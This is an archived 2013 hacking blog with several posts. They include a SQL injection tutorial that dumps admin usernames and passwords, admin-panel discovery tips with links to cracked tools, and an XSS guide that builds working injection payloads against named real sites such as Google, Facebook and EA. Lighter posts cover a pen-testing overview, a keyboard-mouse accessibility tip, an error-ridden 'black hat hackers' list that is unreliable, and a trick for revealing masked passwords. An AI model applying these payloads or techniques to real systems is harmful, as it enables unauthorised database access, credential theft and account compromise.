Saturday 28 December 2013

String Based SQL injection

What is String Based SQL injection and how to notice them?
To make this simple to understand, String Based SQL injection happens when the site is vulnerable to SQL injection but doesn't show us the results needed to be displayed after executing our SQLi query.
Common known issues that proves the site being vulnerable to String Based are:
Code:
"order by" doesn't work, example: order by 100--
"group by" doesn't work
"having 1=2" doesn't work
queries related to SQL injection doesn't work (will show a normal page even though site is vuln to SQLi)


Solution to this issue in order to hack a site with String Based SQL injection
The answer to this problem is by using the following format while trying to hack a site with SQLi
Code:
http://site.com/index.php?id=10' order by 1000--+
That will show us the error, hence displaying the results according to our query.
The point here is that we used the quote ' and the + sign in our query
Code:
id=X' order by--+

Alright that you've got the point lets try String Based on some of the other types of SQL injection shall we

String-Union Based SQL injection
1. Obtaining the number of columns (in this example, we'll use 10 columns)
Code:
http://www.site.com/index.php?id=234' order by 11--+
Results show error, so we'll assume as 10 columns, since it'll be an example for our process

2. Obtaining the Databases
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(schema_name,0x0a),7,8,9,10 from information_schema.schemata--+
Results will display the databases on their website
Note: If you don't know anything about UNION Based SQL injection, I suggest you read one of my tutorials to progress further in this step

3.Obtaining the Tables from the current Database

Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(table_schema,0x0a),7,8,9,10 from information_schema.tables where table_schema=database()--+
Results will display the current table names
For this example, we'll be using the table name: "admin"

4.Obtaining Column names from a specific table (which in this example is "admin")

Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(column_name,0x0a),7,8,9,10 from information_schema.columns where table_name=0x61646d696e--+

Results will display the column names from the current table
To convert plain text to hex, use: http://www.swingnote.com/tools/texttohex.php

For this example, we'll use "username" and "password" as our column names

5.Obtaining Data from Column names

Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(username,0x3a,password,0x0a),7,8,9,10 from admin--+

Results will display the data given by the columns you have chosen

This can be also done with Error Based SQL injection, Blind Based and other types of SQL injection



How to find admin pages

Today im gonna show how to find admin panels when you have info to login.

There's a few options to find it.

1) Adding to URL

http://www.site.com/admin
http://www.site.com/administrator
http://www.site.com/admin.php
http://www.site.com/login

2) Online scanning (Link is at the end)



3) Perl scripts (Script and Active Perl link will be on end of this page)

For this you will need install Active Perl...

4) Programs (Links at the end of the thread)

You can use Havij or Reiluke's admin finder

5) Scan ports (Link at the end of the thread)

For that use nMap.First you need to get your websites IP address.
Go to cmd (start>run>cmd) and type ping site.com (without http://www. After that paste the IP in nMap and click 'Scan'
When finished pick tab 'Ports/computers'


6) Crawl website (Link + crack to acunetix)

Just scan all files and folders on site.Acunetix is the right tool

7) robots.txt

Check robots.txt
http://www.site.com/robots.txt

7) Google

Dork: site:webpage.com "admin"
site:webpage.com "login"

Downloads and links:

Online scanner -> http://sc0rpion.ir/af/

Download Perl -> http://www.activestate.com/activeperl/downloads
Perl script -> http://pastebin.com/WWZszURW

Havij (Uploaded by me) -> http://www.mediafire.com/download.php?s2iiaabz87i7t8a
Reiluke admin finder (Uploaded by me) -> Automatic download

nMap -> http://nmap.org/download.html

Acunetix (Uploaded by me) -> http://www.mediafire.com/download.php?vam13z7pe1b85kl

Password for locker .rar is

www.reiluke.i.ph

XSS


XSS
[Behind the mask]

What is XSS?

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications that enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy. Cross-site scripting carried out on websites accounted for roughly 80.5% of all security vulnerabilities documented by Symantec as of 2007.[1] Their effect may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site's owner.<exlanation from Wikipedia>

Let’s XSS


XSS is not just pasting XSS attack vectors in search boxes , and address bars , you have to know where that input is going , how is it being parsed , etc... If you wanna learn how to find XSS holes on pages first you need to have atleast basic knowledge of HTML , Javascript and a little bit of PHP . So in this paper I will go over some XSS vulnerable websites from XSSed.com , and we will be reviewing source code of those vuln web sites. My main goal is to show you how to properly build your XSS attack vector.

I will not:
1. Show you how to steal cookies
2.Take responsibility for your action after you read this paper.

Our first site will be:
1 .
Code:
http://www.un.lk/media_centre/press_releases.php?id=#

Lets try and change the # to something else , for example. id=XSSTest and we see that no error is shown so we can assume that webpage has accepted our input , lets see where in the source is our XSSTest string located.

Source of [http://www.un.lk/media_centre/press_releases.php?id=XSSTest ] :

Spoiler (Click to View)

Great in both examples we are already inside JavaScript

But this doesn’t proves anything , lets see will <> be parsed so next we go:
[www.un.lk/media_centre/press_releases.php?id=<script>]

Source of [www.un.lk/media_centre/press_releases.php?id=<script>] : 

Spoiler (Click to Hide)
[Image: untitled2.jpg]

Great our input is not being parsed , if it were we would have &lt;script&gt;
instead of <script> .

I will show you 2 options how to exploit it :

1. jshow(<script>) in here you can see we are already inside the javascript so we can just do
Code:
www.un.lk/media_centre/press_releases.php?id=alert(0)
and our alertbox will be executed. Why , you ask? Look at the source code :

Spoiler (Click to Hide)
[Image: slika3.jpg]

Our alertbox is taken as valid input and processed by our browser and there you have alertbox.[ onload= ] is Jscript event that triggers when page is loaded , so when you call it onload="Here is where javascript is located" , everything inside onload event will be processed as valid input , and so is our alert(0).

2.Every element on webpage has it’s openning [ < ] and closing [ > ] tag.
);jshow(<script>);"> as you can see closing is done with );"> so it goes like this alert(0) );"> , so for our XSS to work we must close the body tag and start a new <script> tag.So in this case we use :

Code:
www.un.lk/media_centre/press_releases.php?id=);"><script>alert(0)</script>

Source code :

Spoiler (Click to Hide)
[Image: untitled4.jpg]

You see we closed the body tag and started the new <script> tag , and cos it’s valid it is executed.

Also another way is :

<script language="javascript" type="text/javascript" defer="defer">

news_toggle_visibility(<script>);

</script>

to escape the tag we use );</script><script>alert(0)</script> (we closed the existing <script> with );</script> and started new one <script>alert(0)</script> )

The url is :
Code:
http://www.un.lk/media_centre/press_releases.php?id=);</script><script>alert(0)</script>

Source:

Spoiler (Click to Hide)
[Image: untitled5.jpg]

or we can do this :

Code:
http://www.un.lk/media_centre/press_releases.php?id=);</script><script>alert(0)</script><script>alert(12

In solution before we saw there is ); left after our injected XSS vector so here is the source:

Spoiler (Click to Hide)
[Image: untitled6.jpg]

We just added <script>alert(12 vector and );</script> just closed our injected script tag.

Code:
http://www.chip.de/ii/grossbild_v2.html?sales=2122

Time to review the code , after searching for value 2122 inside the source code we get :

Spoiler (Click to Hide)
[Image: untitled7.jpg]

As you can see like in our first example we are already inside <script> tag , but in this case we have to close the value and input new Jscript code , in our case we have"2122"; so first part of our XSS vector will be "; . So lets try "; alert(0);

Code:
http://www.chip.de/ii/grossbild_v2.html?sales="; alert(0);

Source :

Spoiler (Click to Hide)
[Image: untitled8.jpg]

As you can see we are inside the script but no alertbox is shown , but why is that , it’s because of "; after our XSS attack vector , and as you can see every value that is assigned to variable has opening " and closing " and in our case we have closed somtr.prop48=" value with "; but there is "; left unclosed. You can see the problem first value is closed but what is with third " , we have to close it too , so our XSS link will be :

Code:
http://www.chip.de/ii/grossbild_v2.html?sales="; alert(0); MaXoNe="XSS

So lets see the source :

Spoiler (Click to Hide)
[Image: untitled9.jpg]

As you can see we closed the third " and our alertbox is shown , so the rule is try to close either every tag or every value with your XSS attack vector...You will have less errors on the page you are XSSing and your XSS vector will look cooler .

Code:
http://www.bhtelecom.ba/korisnicki_portal.html?&no_cache=1 [POST][Self XSS]

Self XSS is XSS attack that is trigered when user enters payload inside the vulnerable input box , it takes SE for this type of XSS.Unlike for GET method when we can see our XSS payload inside the link bar in our browser , POST method wont show you what is webpage sending to server , so we have to use tools to see what POST values we are sending to server , we can use :

1. Live HTTP headers [http://www.youtube.com/watch?v=bz7KGhraX-0 ]
2. BurpSuite Proxy [lookup Hooded Robin’s tut on that]

Here we have two input boxes , one says "Login ili mobitel" and the other "Lozinka" , so lets input something inside those two input boxes and press OK button.
Lets input Text"<>/\ in "Login ili mobitel" field and Text2"<>/\ in "Lozinka" field. We get an error but lets see where did our input go , so here is the source :

Spoiler (Click to Hide)
[Image: untitled10.jpg][spoiler]

We see that our input did some changes to source code , first value from login input box , closed the source value :

src="https://portal.bih.net.ba/amserver/UI/Login?Login.Token1=Text\"<>/\\

And we can see that our input is not being encoded , so lets now try this:

First input box : TestXSS
Second input : "></iframe></div><script>alert(0)</script>

And when we press OK button , we get alert box , lets see why is that :

[spoiler][Image: untitled11.jpg]

What happened:

"> ----that closed src value in opened iframe tag :

<iframe src="https://portal.bih.net.ba/amserver/UI/Login?Login.Token1=sss&Login.Token2=\">

</iframe> ---- closed iframe tag :

<iframe src="https://portal.bih.net.ba/amserver/UI/Login?Login.Token1=sss&Login.Token2=\"></iframe>

<script>alert(0)</script> --- new script tag with alertbox

and thats it , we escaped the iframe tag with "></iframe> and added new script tag <script>alert(0)</script>.To hide any errors use either

1. "></iframe></div><script>alert(0)</script><!— (coments out the rest of code)
2. "></iframe></div><script>alert(0)</script><iframe> (figure it out )

And now , maybe you think that XSS attacks can’t make any damage but big companies like Google and Facebook have a reward program for XSS findings on their sites , cos XSS attacks can be used to steal users cookies [http://jehiah.cz/a/xss-stealing-cookies-101 ]] and when you consider that big companies have millions of users , vulnerability like XSS can have devastating effect.
Se lets analyze Google XSS vulnerability which was found by ElvinGuitar, user from HackForums.net :

Vuln. link :
Code:
https://www.google.com/voice/rates?p=
Lets try :
Code:
https://www.google.com/voice/rates?p=XSSTest

We get the same page so out input is accepted , and now lets review the code :

Spoiler (Click to Hide)
[Image: untitled12.jpg]

Here is our input lets evaluate how we can exploit it , so first we notice we are inside the script , and we have '); as our first part of XSS attack vector , so lets do this

Code:
https://www.google.com/voice/rates?p='); alert(0);</script>

So this is the result:

<script>
var callingRatesPage = new _callingRatesPage(
'en',
'USD','';); alert(0);</script>');
callingRatesPage.render(document.getElementById('calling-rates-page'));
</script>

We closed the value with '); and added our alert event alert(0); and we close the script tag with </script> and we get our alert box.

Seems easy doesn’t it , well ElvinGuitar got 1000$ for that XSS .

And now facebook :

Code:
http://www.facebook.com/ads/create/photos/creative_uploader.php?controller_id=c4c288b438ed080&path=whatever&src=whatever&vol=90&w=60&h=80&post_upload=1

So here is one advice , try searching the values from the url inside the source code , so in this case we would search the c4c288b438ed080 value and this is what we get , also you should search every value after the = in Url , and see where it’s located , so here is the source code :

<script>
...
onloadRegister(function (){window.parent.__UIControllerRegistry["c4c288b438ed080"].saveUploadedImage("whatever", "whatever", 90, 60, 80);});
...
</script>

Nice , so lets replace c4c288b438ed080 with Test<>"\/ an we get this :

Code:
http://www.facebook.com/ads/create/photos/creative_uploader.php?controller_id= Test<>\/&path=whatever&src=whatever&vol=90&w=60&h=80&post_upload=1

And the source code :

<script>
...
onloadRegister(function (){window.parent.__UIControllerRegistry["Test<>\/ "].saveUploadedImage("whatever", "whatever", 90, 60, 80);});
...
</script>

Great , our input is not being encoded , so we see we are inside the {[ ]}; brackets , so we have to close that value with MaXoNe″]}; alert(0); // and so the url will be :

Code:
http://www.facebook.com/ads/create/photos/creative_uploader.php?controller_id=MaXoNe″]}; alert(0); // &path=whatever&src=whatever&vol=90&w=60&h=80&post_upload=1

And source code:

<script>
...
onloadRegister(function (){window.parent.__UIControllerRegistry["MaXoNe"]};alert(0); //"].saveUploadedImage(„whatever“, „whatever“, 90, 60, 80);});
...
</script>

What happened , well ″]}; closed the value and alert(0); triggered our alerbox and // is used to coment out the rest of the code all the way to the </script>.

We could use this too :

Code:
http://www.facebook.com/ads/create/photos/creative_uploader.php?controller_id=MaXoNe″]}; alert(0); </script><!--&path=whatever&src=whatever&vol=90&w=60&h=80&post_upload=1

The difference is that we closed the script tag and commented the rest of the code , like this :

<script>
...
onloadRegister(function (){window.parent.__UIControllerRegistry[″MaXoNe″]};alert(0); </script><!—″].saveUploadedImage(″whatever″, ″whatever″, 90, 60, 80);});
...
</script>

The green code is commented out because of the <!-- .

And this one I found on ea games site :

Code:
http://www.ea.com/search?q=

So lets try :
Code:
http://www.ea.com/search?q=Test<>/\″

And lets see what we got :

Spoiler (Click to Hide)
[Image: untitled13.jpg]

We see that <> is filtered(deleted) but ″ is not being encoded , now we know that we can escape the value of title=″ ″ so first part of our XSS payload is ″ and what can we do next , lets see , first we can’t use < > so no script , img , body or any other tag , but we are inside the <h1> tag which is the heading value , and there are Jscript events that can be used by almost every HTML element , like :

onmouseover= activates JScript code when user moves mouse over HTML tag to who event belongs.

onclick= activates JScript code when user clicks on HTML tag to who event belongs.

ondblclick= activates JScript code when user dblclicks on HTML tag to who event belongs.

onmouseout= activates JScript code when cursor leaves the are off HTML tag to who event belongs.

So we can do this :
Code:
http://www.ea.com/search?q="onclick="alert('MaXoNe');""
Code :
Spoiler (Click to View)
With " we escaped the value , and added onclick=alert("MaX"); event and with next " we closed the value that was left behind , or we can use " onclick=alert("MaX"); //.
With // we comment out the rest of code all the way to > . So when we click the heading we get alertbox .

SQLi and XSS

URL from zerofreak’s SQLi tutorial on HF.

Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11--
There are vuln. columns shown on the page , we will select column 8 , so lets see the source :

Spoiler (Click to Hide)
[Image: untitled19.jpg]

We will use :

Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,'</font><script>alert(/maxone/)</script><font>',9,10,11—

Look at the source and figure it out , it’s time for you to do something.

Or if magic_quotes is enable we can bypass it by hexing our value :

Code:
http://www.armorysquareofsyracuse.com/main/shopping.php?id=179  and false union /*!select*/ 1,2,0x3c2f7469746c653e3c7363726970743e616c6572742830293c2f7363726970743e,4,5,6,7​,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--

Where 3c2f7469746c653e3c7363726970743e616c6572742830293c2f7363726970743e is </title><script>alert(0)</script>.
Again review the source to find out why did I used this payload.

Thats all from me , my advice go on XSSed.com , and look at mirrors , search the code ,try different XSS payloads, be creative.
Also if you want to be good XSSer master HTML and Jscript , there is no other way.
Knowledge is power.

Friday 27 December 2013

Penetration Testing

What is the advantage of Penetration Testing Distribution?
All Required application for security test are gathered in a single Operating system. You don't need to search for application, Save your time. Penetration Testing Distribution are open source and free to use. You can install in pen drive and bring it anywhere.Penetration Testing(Pen Testing) is the act of evaluating the Security of system or network by exploiting vulnerabilities. This will determine whether unauthorized or malicious activity is possible in a system. Vulnerability uncovered through the Pen Testing will be presented to the system's owner.


Why Penetration Testing?

  • Pentetration testing can identify the vulnerabilities that is not identified by an automated vulnerability scanners.
  • Determining the feasibility of a particular set of attack vectors
  • Determining the Critical Vulerabilities .
  • Assessing the magnitude of potential business and operational impacts of successful attacks
  • Testing the ability of network defenders to successfully detect and respond to the attacks
  • Testing stability of the system against the DDOS attack.



White Box vs Black Box vs Grey Box Testing:
Penetration testing can be performed in different ways. The methods can be classified into three types based on the knowledge about the System being tested.

White Box:
In white box testing, Pen Tester know everything about the system such as source code,network diagrams, ip addressing info.

White box testing simulates what might happen during an "inside job" or after a "leak" of sensitive information, where the attacker(malicious insider) has access to source code, network layouts, and possibly even some passwords.

Black Box:
Pen Tester test the system without prior knowledge about the system. This method is also known as Blind Testing . Black box testing simulates an attack from someone who is unfamiliar(malicious outsiders) with the system.

Grey Box:
In this method, Pen Tester partially know about the system.

Web application penetration testing:
This testing will be used to find the following web application vulnerabilities:

  • SQL Injection
  • XSS(Cross site Scripting)
  • Buffer overflow
  • Clickjacking
  • DDOS
Penetration Testing Tool:
Penetration Testing tools are used as part of a penetration test to automate certain tasks, improve testing efficiency, and discover issues that might be difficult to find using manual analysis techniques alone.

As a Penetration Tester, you will need lot of Penetration testing tools to test the Security of system. Searching ,downloading and installing the required software may take time. You can use a Penetration Testing Distribution instead.

What is Pen Testing Distribution?
Penetration Testing Distribution is an open source Operating System(Derived from Linux/BSD) that combines all required application for testing the security of system. It is specially developed for Security Professionals(Pen Testers/EthicalHackers/Forensic Officers...)
Eg: Backtrack 5 Linux .



Use Keyboard as Mouse


Use Keyboard as Mouse 

If your mouse is not working and you don't wish to wait till you get a new mouse, you would definitely like to know how you can use your keyboard as your mouse. It is easy to use your mouse as keyboard in Windows using the On Screen Keyboard utility, but it is also possible to do the reverse.

Keyboard Mouse

All you need to do is:

Windows XP Users:-
  1. Go to Control Panel.
  2. Then click on Switch to Classic View.
  3. Then Click on Accessibility Options.
  4. Then Click on the Mouse Tab.
  5. Select Use MouseKeys.
  6. Click on OK.
  7. Then activate NumberLock (by pressing the NumLk key).
  8. You should hear a beep sound.
  9. Now you can control the mouse pointer using the arrow keys on the numeric keypad.
use keyboard as mouse


Windows 8Windows 7 and Vista Users:

  1. Open Ease of Access Center by clicking the Start button , clicking Control Panel, clicking Ease of Access, and then clicking Ease of Access Center. 
  2. Click Make the mouse easier to use.
  3. Under Control the mouse with the keyboard, select the Turn on Mouse Keys check box.

You can also increase the acceleration and speed of your mouse movements according to your needs.

You can alternately press the Alt+Shift+Num Lock combination to instantly activate the mouse keys.


Laptop Keyboard Mouse

For laptops, this will only work if your laptop keyboard has a numeric keypad or alternative keys which you can enable by pressing the Number Lock Key or the Function key.

On my laptop, number 6 key of the numeric keypad moves the mouse pointer left, number 4 key moves the mouse pointer right, number 2 key moves it down, number 8 key moves the mouse pointer up, number 5 and + key serve as right click while the number 0 key works as left click.

Tuesday 24 December 2013

Top 6 Black Hat Hackers In The World


Top 6 Black Hat Hackers In The World


There are two types of hackers. First one are good hackers who are known as "white hat" hackers and another one which we will be talking about today are called "black hat" hackers. In this article, we will be talking about six famous black hat hackers and theirhacks which made them famous or wanted.

George Hotz

Young and talented and what is the most important bored teenager, George Hotz wanted to have fun one summer night and  as a result he hacked the Sony’s company Iphone. It happened in June of 2007, by that time George was 17. It was a bit of a challenge, because how to hack device with assistant things?  The secret is to figure out how “to speak to the device”.He also mentioned that what he did was completely legal.It seems people can be dangerous in certain way when they are bored. Who knows what may happen if crazy smart geek will find thy way of his ideas.

Kevin Mitnick                                                            

Kevin Mitnick is well-known as the most-wanted computer criminal in the United States. He was in high school when he started hacking. For several years he hacked dozens of companies.What interesting, for those “services” he was finally arrested in 1995 at his apartment for hacking. Kevin also has served 5 years in prison, nevertheless despite of his experience he runs his own security firm named Mitnick Security Consulting. The other side of the coin is, however Mitnick published a book that calls “Ghost in Wires”, which is about his upps-and-downs, victories and crushes. He shared that every hack was like a climbing to mountain and he reached the Everest. This is one more proof how talent have pined, because of a boredom.

Adrian Lamo

Adrian was called as the most effective and controversial hacker of the 21st century. That is very flattering status.He was famous for breaking into several high-profile computer networks. Lamo might use his gift to help people to consult, what is actually he did, but as exception and compromise.His baby steps in hacking, Adrian Lamo made pretty early and became known for the first time for operating AOL watchdog site.As many others, he was arrested in 2003 and had to correspond for each and every computer crime.Thus, even if Lamo now works as a threat analyst and public speaker, his glory will always follow him, because our past if the part of our “present”  and a part of who we are.

Gary McKinnon 

This “black hat” McKinnon  hacked into 97 United States military and NASA computers. He could be the biggest threat  for government. Glasgow-born McKinnon wanted the truth to come out and show itself. In March 2002 Gary was arrested by police. “Black hat” used his hacking skills to “research” his beliefs and evidence of UFOs  inexhaustible source of power, into the US government’s computers. He didn’t do that because of boredom, but because of obsession and thirst to hidden knowledge. Probably this computer crime is serious, but forgivable. Man wasn’t going to hack computer system because he was bored or to prove something, we was looking for truth no more than.

Jonathan James

Story of Jonathan James  is sad, nevertheless his life can be compared to comet – short, but bright. In 1999 teenager at the age of 15 years old hacked into Bellsouth and Miami-Dade school network. Jonathan James damaged NASA Systems, it costed $41,000 to fix the systems.  It goes without saying that he made serious damage. To stole software from NASA that worth $1.7 Million is one the biggest computer crimes. He wasn’t after information or justice, he was after money… As they say, never speak ill of the dead.Jonathan James was sentenced 6 months house arrest and banned from using computer, however that didn’t prevent him to commit suicide.

Kevin Poulsen

This talented “cyber-terrorists” could have great career and almost blow his chance.  It seems that this hacker likes contracts  and his life reflects it pretty well. He hacked into the US Department of Defense's Arpanet. However later  he worked as a consultant testing Pentagon computer security. Late on Kevin hacked  FBI, after that hacked phone lines to radio station  of Los Angeles… Poulsen’s life reminded American switchbacks…Certainly he was wanted by FRI  and finally they caught him. Despite of such interesting past, Kevin is law-abiding citizen and has several awards  of International Academy of Digital Arts and Sciences.

Tuesday 17 December 2013

SIMPLE way to see the password behind asterisks [NO SOFTWARE NEEDED]


Tested with Firefox and Chrome

All you need to do is highlight and right click the password field of the target page, and click "Inspect Element".

For something like Facebook, here's how it would look:


[Image: ibiPz5jwcfyOw4.png]

Code:
<input type="password" class="inputtext" name="pass" id="pass" tabindex="2">

Now change the type="password" to type="text"


[Image: ibm5lrHz1CknIY.png]

And there you have it!
Unfortunately I couldn't show the password being revealed in real time since they are just images but you can test it out in the matter of seconds and see it work.

I've tested this with Yahoo, Gmail, YouTube and Facebook so I'm sure it works with various other sites as well.